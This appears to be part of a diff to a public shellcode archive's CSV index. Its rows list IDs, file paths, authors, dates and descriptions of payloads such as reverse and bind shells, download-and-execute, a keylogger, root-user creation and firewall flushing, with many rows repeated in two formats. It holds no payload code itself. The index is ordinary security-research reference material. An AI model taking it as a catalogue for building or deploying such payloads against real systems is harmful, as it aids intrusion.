40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40175,shellcodes/windows_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
40245,shellcodes/windows_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40246,shellcodes/windows_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40259,shellcodes/windows_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43565,shellcodes/linux_x86-64/43565.asm,"Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
43566,shellcodes/linux_x86-64/43566.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43568,shellcodes/linux_x86-64/43568.asm,"Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43570,shellcodes/linux_x86-64/43570.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43598,shellcodes/linux_x86-64/43598.c,"Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43599,shellcodes/linux_x86-64/43599.c,"Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43601,shellcodes/linux_x86-64/43601.asm,"Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43602,shellcodes/linux_x86-64/43602.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43603,shellcodes/linux_x86-64/43603.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43604,shellcodes/linux_x86-64/43604.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43605,shellcodes/linux_x86-64/43605.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43606,shellcodes/linux_x86-64/43606.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43607,shellcodes/linux_x86-64/43607.c,"Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64
43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
41375,shellcodes/linux/41375.c,"Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
41381,shellcodes/windows_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86
41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41467,shellcodes/windows_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41581,shellcodes/windows_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha
43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86
43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86
43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43507,shellcodes/freebsd_x86/43507.c,"FreeBSD - reboot() Shellcode (15 Bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix
43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix
43510,shellcodes/irix/43510.c,"IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
43510,shellcodes/irix/43510.c,"IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix
43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
@ -646,45 +664,52 @@ id,file,description,date,author,type,platform
43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm
43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm
43536,shellcodes/arm/43536.c,"Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)",2009-01-01,"Neil Klopfenstein",shellcode,arm
43536,shellcodes/arm/43536.c,"Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)",2009-01-01,"Neil Klopfenstein",shellcode,arm
43537,shellcodes/arm/43537.c,"Linux/StrongARM - setuid() Shellcode (20 bytes)",2009-01-01,funkysh,shellcode,arm
43538,shellcodes/arm/43538.c,"Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes)",2009-01-01,funkysh,shellcode,arm
43539,shellcodes/arm/43539.c,"Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)",2009-01-01,funkysh,shellcode,arm
43539,shellcodes/arm/43539.c,"Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes)",2009-01-01,funkysh,shellcode,arm
43545,shellcodes/linux_sparc/43545.c,"Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes)",2009-01-01,anathema,shellcode,linux_sparc
43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4
43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
43549,shellcodes/linux_x86-64/43549.c,"Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86
41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42428,shellcodes/linux_x86/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
